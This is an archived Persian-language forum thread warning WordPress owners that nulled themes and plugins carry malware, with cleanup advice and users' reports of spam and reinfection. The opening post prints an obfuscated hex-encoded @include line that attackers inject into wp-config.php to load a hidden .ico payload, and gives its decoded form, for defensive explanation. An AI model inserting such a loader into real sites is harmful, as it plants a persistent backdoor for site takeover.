PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

sazsaz
December 11th, 2017, 23:17
هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی
قبلا چندین بار هشدار دادیم و کسی توجه نکرد
متاسفانه قالب ها و افزونه های نال ، بازاری شده برای برخی کاربران و فکر این را نمی کنند که زحمت چند ساله یک شخص را می توانند به باد دهند
عزیزان خواهش می کنم از این قالب ها استفاده نکنید اگر قصد استفاده هم دارید احتیاط کنید
هکر با استفاده از کد های مخربی که در این قالب ها و افزونه ها وجود دارد استفاده کرده و کارهای زیر را انجام می دهد .
- چند مدیریت برای خویش فعال می کنند
- با استفاده از مدیریت فایل های مخرب بسیار در هاست آپلود می کنند (از طریق ویرایشگرها )
فایل اصلی آنها با پسوند .ico بوده و دارای امضایی با نوشته می باشد.
من نام دوتا فایل را برای نمونه که از دوسایت کاربران هک شده یافتم قرار می دهم .
favicon_3a0642.ico
favicon_993c6a.ico
حالا با آن دسترسی ها همه جا را ویرایش و خراب می کنند
در فایل wp-config.php فایل ایکن و ویروس خود را با چنین کدهایی فراخوانی می کنند

@include "\x2fh\x6fm\x65/\x6ea\x67h\x61s\x68y\x2fp\x75b\x6ci\x63_\x68t\x6dl \x2fw\x70-\x63o\x6et\x65n\x74/\x75p\x6co\x61d\x73/\x66a\x76i\x63o\x6e_\x399\x33c\x36a\x2ei\x63o";

که دیکد آن چنین می شود

@include "/home/8888/public_html/wp-content/uploads/favicon_993c6a.ico";

حال با توجه به فایل با استفاده از دستوراتی که در آن فایل هست همه کار می کنند مثلا در چند جا من دیدم که ایمیل تبلیغاتی می فرستند .....

حال چطور این طور سایت ها را رفع مشکل کنیم
1- اول وارد مدیریت شده و مدیران را بررسی و کاربر اضافی با دسترسی مدیریت را پاک می کنیم
2- وارد سایت شده و اکانت های اف تی پی را بررسی می کنیم
3- وارد سایت شده و فایل کانفیگ را باز کرده و کد های کد شده در سایت unphp.net زده و مسیر فایل آیکن را مشخص می کنیم و کد را نیز از فایل کانفیگ حذف می کنیم
4- سطح فایل کانفیگ را 444 قرار می دهیم
5- جستجو کرده و فایل های مشکوک را نیز حذف می کنیم
6- بر روی پوشه مدیریت پسورد می گذاریم
7- برای پوشه های آپلود و برخی افزونه ها فایل ایندکس قرار می هیم.

برگرفته شده از انجمن وردپرس ایرانی (http://wpir.ir/thread63.html)

mre
December 11th, 2017, 23:27
سلام
ممنون بابت مطلب خوبتون
واقعا این یکی از معضلات امروزی حوزه وب هست و نمیدونم تا کجا میخواد توسط افراد سودجو ادامه پیدا کنه

در تکمیل مطالب بالا شاید بررسی دسترسی ها به دیتابیس از طریق cPanel و گزینه Remote MySQL هم خالی از لطف نباشه که فقط IP سرور قابلیت دسترسی داشته باشه و غیر از اون دسترسی دیگه ای وجود نداشته باشه

موفق باشید
با احترام

sazsaz
December 11th, 2017, 23:32
سلام
ممنون بابت مطلب خوبتون
واقعا این یکی از معضلات امروزی حوزه وب هست و نمیدونم تا کجا میخواد توسط افراد سودجو ادامه پیدا کنه

در تکمیل مطالب بالا شاید بررسی دسترسی ها به دیتابیس از طریق cPanel و گزینه Remote MySQL هم خالی از لطف نباشه که فقط IP سرور قابلیت دسترسی داشته باشه و غیر از اون دسترسی دیگه ای وجود نداشته باشه

موفق باشید
با احترام

دقیقا توی 10 روز گذشته با بیش از 7 سایت با این مشکل برخورد کرده ام و همه از قالب های نال استفاده می کردند

Parti_Baz
December 12th, 2017, 02:43
بنده با نصب یک پلاگین نال شده ووکامرس در عرض یک هفته سه بار هک شدم که ایملهای تبلیغاتی ارسال میشد موجب شد ای پی سرور اسپم بشه و ایمیل هاستینگ کلا از کار بیفته که بلاخره پلاگین رو جایگزین کردم و با نصب چند افزنه امینتی فایلهای مشکوک و مخرب رو حذف کردم خداروشکر الان دو هفته است پاک پاکم :)

a1994n1373
December 12th, 2017, 06:18
سلام دوست عزیز . مرسی از اطلاع رسانیتون . بله متاسفانه مردم ما کیفیت و اوریجینال بودن رو فدای قیمت پایین و یا رایگان بودن می کنن !!!

Aria90
December 12th, 2017, 09:06
درود
متاسفانه من چندین ماهه درگیر این نوع سایت ها هستم و هر کاریم میکنیم باز بر میگردن با هر ابزاریم ک تست می کنیم چیزی پیدا نمیکنه
تمام کدهای مخربش رو پاک میکنیم ولی بعد 1 روز مجدد ظاهر میشن.واقعا روی اعصابه این نوع آلودگی!!

sazsaz
December 12th, 2017, 10:14
درود
متاسفانه من چندین ماهه درگیر این نوع سایت ها هستم و هر کاریم میکنیم باز بر میگردن با هر ابزاریم ک تست می کنیم چیزی پیدا نمیکنه
تمام کدهای مخربش رو پاک میکنیم ولی بعد 1 روز مجدد ظاهر میشن.واقعا روی اعصابه این نوع آلودگی!!
همانطور که می بینیم همه عاصی و کلافه هستند .
من سایت یکی از کاربران را جدیدا کامل حذف و دوباره بالا آوردم
البته لازم هست بگم که بهتره پسورد مدیریت را چک کنید از طریق پسورد و کرک آن نیز دست به این اعمال می توان زد

rahimi_m321
December 12th, 2017, 11:12
ممنون از اطلاع رسانیتون

iranian-portal
December 12th, 2017, 15:27

در واقع سوء استفاده از طراح و خالق این محصولات انجام شده، نه از کسایی که دنبال مفت هستن!

سالهاست با خواهش و تمنا، التماس به این و اون، برای فرهنگ کپی رایت و استفاده از محصولات اورجینال دارم زحمت میکشم، چیزی جز خنده و مسخره دیگران ندیدم که وقتی مفتش هست، کی میاد بخره!

اینم آخر و عاقبتش!

codfather
December 12th, 2017, 16:17
توی تلگرام هم شیوع پیدا کرده
قالب ها و اسکریپت های پولی رو آلوده میزارن
اغلب هم قالب های فروشگاهی وردپرس!!!!

bakuryu
December 12th, 2017, 21:04
من حتی مقاله ای رو دیدم که قید کرده بود که برخی از نال شده ها صرفا برای همین منظور منتشر شده اند

متاسفانه خیلی ها تا به مشکل نخورند جدی نمیگیرند

delta
December 13th, 2017, 00:32
از rtl قالب ووکامرس خریدم هر هفته یا ایراد پیدا میکرد یا کرش میکرد..سازندش میگفت ارجینال خریده اما کاملا مشخصه دروغ میگفت چون ایرادات مسخره ای پیدا میکرد اعصابمو به هم میریخت ..کلا بازار قالب و فروشش شده مسخره بازی هر کی یه قالب نال برمیداره ویرایشش میکنه میزاره فروش..اخرشم همین مسخره بازیها...اخر زدم فروشگاهمو پاک کردم!! احتمالا برم یه نیوکی چیزی نصب کنم مثل چندین سال پیش یه فروشگاه سنتی قدیمی راه بندازم...درسته دستی هست همه چیزش اما خدایی این مسخره بازیها رو نداره...

mre
December 14th, 2017, 17:29
از rtl قالب ووکامرس خریدم هر هفته یا ایراد پیدا میکرد یا کرش میکرد..سازندش میگفت ارجینال خریده اما کاملا مشخصه دروغ میگفت چون ایرادات مسخره ای پیدا میکرد اعصابمو به هم میریخت ..کلا بازار قالب و فروشش شده مسخره بازی هر کی یه قالب نال برمیداره ویرایشش میکنه میزاره فروش..اخرشم همین مسخره بازیها...اخر زدم فروشگاهمو پاک کردم!! احتمالا برم یه نیوکی چیزی نصب کنم مثل چندین سال پیش یه فروشگاه سنتی قدیمی راه بندازم...درسته دستی هست همه چیزش اما خدایی این مسخره بازیها رو نداره...

مطمئن باشید همون وردپرس رو هم اگر از راه درستش وارد بشید هیچ موقع به مشکل نمیخورید
تمامی مواردی که دوستمون گفتن رو رعایت کنید و قالب رو هم یا بدید اختصاصی براتون کد بزنن (حتما یک جای مطمئن) یا خودتون قالب رو مستقیم از themeforest بخرید، جز این 2 راه هیچ راه دیگه ای توصیه نمیشه
موفق باشید
با احترام